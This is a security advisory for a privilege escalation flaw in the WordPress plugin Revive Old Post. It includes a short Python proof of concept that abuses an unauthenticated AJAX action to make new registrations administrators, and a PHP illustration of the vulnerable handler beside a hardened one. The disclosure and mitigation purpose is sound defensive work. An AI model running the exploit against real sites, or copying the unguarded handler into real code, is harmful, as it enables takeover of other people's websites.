Revive Old Post <=6.9.0, Privilege Escalation
Leveraging a publicly accessible AJAX function named 'update_response' (reachable without authentication through wp-admin/admin-ajax.php), it is possible to update any option within the WordPress installation. Using this vulnerability, an unauthenticated attacker can gain administrative access by setting the option 'default_role' to 'administrator' and 'users_can_register' to '1', and then registering a new account through the normal registration form. The new account is created with administrative privileges, because 'users_can_register' enables self-registration and 'default_role' is the role WordPress assigns to every self-registered user. The PoC below performs both steps.
Homepage
https://wordpress.org/plugins/tweet-old-post/
CVSS Score
9
CVSS Vector
(AV:N/AC:L/Au:N/C:P/I:P/A:C)
Attack Scope
remote
Authorization Required
None
Mitigation
Update to version 6.9.4.
Proof of Concept
import requests

target = 'http://localhost'

# Step 1: abuse the unauthenticated 'update_response' AJAX action. The value of
# dataSent[dataSent] is a query string of option names and values that the
# plugin writes into the WordPress options table, with no nonce, capability
# or allowlist check.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "update_response",
    "dataSent[dataSent]": "default_role=administrator&users_can_register=1",
}
requests.post(url, data=payload)

# Step 2: register a normal account. Registration is now enabled and the new
# user receives the default role, which is 'administrator'. WordPress e-mails
# the login details to the address given, so it must be one the attacker reads.
url = '%s/wp-login.php?action=register' % target
payload = {
    "user_login": "test",
    "user_email": "test@test.com",
    "redirect_to": "",
    "wp-submit": "Register",
}
requests.post(url, data=payload)
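To make the fix concrete, the following is an added illustration of the handler pattern the advisory describes, beside a hardened version. It is not the plugin's source and not the vendor's patch. What is taken from the advisory is only that the action is named 'update_response', is reachable without authentication through admin-ajax.php, and accepts a query string of option names and values in dataSent[dataSent]; the function names, the 'rop_' prefix, the nonce action name and the option allowlist are assumptions. Both versions are shown in one file for comparison; a real plugin would contain one or the other.

```php
<?php
// Added illustration, not the plugin's code. Names prefixed rop_ are hypothetical.

// --- Vulnerable pattern ---------------------------------------------------
// Registering the action on the wp_ajax_nopriv_ hook makes it reachable by
// anonymous POSTs to /wp-admin/admin-ajax.php with action=update_response.
add_action( 'wp_ajax_nopriv_update_response', 'rop_update_response_vulnerable' );
add_action( 'wp_ajax_update_response',        'rop_update_response_vulnerable' );

function rop_update_response_vulnerable() {
    // "default_role=administrator&users_can_register=1" becomes an array of pairs
    parse_str( $_POST['dataSent']['dataSent'], $pairs );
    foreach ( $pairs as $name => $value ) {
        // Any option, including core ones, with no nonce, no capability check
        // and no allowlist. This is the whole bug.
        update_option( $name, $value );
    }
    wp_die();
}

// --- Hardened version -----------------------------------------------------
// 1. no nopriv hook, so anonymous requests never reach the handler;
// 2. nonce check against CSRF from a logged-in admin's browser;
// 3. capability check, since any logged-in user can call wp_ajax_ actions;
// 4. allowlist of option names with a sanitiser each, so core options such
//    as default_role and users_can_register can never be written here.
add_action( 'wp_ajax_update_response', 'rop_update_response_hardened' );

function rop_update_response_hardened() {
    // Expects a 'nonce' POST field created with wp_create_nonce( 'rop_update_response' ).
    check_ajax_referer( 'rop_update_response', 'nonce' ); // dies on failure

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient privileges', 403 );
    }

    // Hypothetical plugin settings; each maps to the sanitiser applied to its value.
    $allowed = array(
        'rop_interval_hours' => 'absint',
        'rop_tweet_prefix'   => 'sanitize_text_field',
    );

    $raw = isset( $_POST['dataSent']['dataSent'] )
        ? wp_unslash( $_POST['dataSent']['dataSent'] )
        : '';
    parse_str( $raw, $pairs );

    $updated = array();
    foreach ( $pairs as $name => $value ) {
        if ( ! isset( $allowed[ $name ] ) ) {
            continue; // unknown or core option: ignored, never written
        }
        update_option( $name, call_user_func( $allowed[ $name ], $value ) );
        $updated[] = $name;
    }
    wp_send_json_success( $updated );
}
```

The allowlist is the control that matters most for this class of bug: nonce and capability checks stop anonymous and cross-site callers, but a settings endpoint that still accepts arbitrary option names would let any user with the required capability (or any future bypass of those checks) rewrite core options such as 'default_role'. When reviewing a plugin, grep for wp_ajax_nopriv_ hooks and follow each one to every update_option call it can reach.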
Timeline
- 2015-01-05: Discovered
- 2015-01-05: Vendor notified
- 2015-01-05: Vendor responded
- 2015-01-11: 6.9.0 released – vulnerability still present
- 2015-01-14: 6.9.4 released – issue resolved
- 2015-01-15: CVE Requested
- 2015-02-02: Advisory released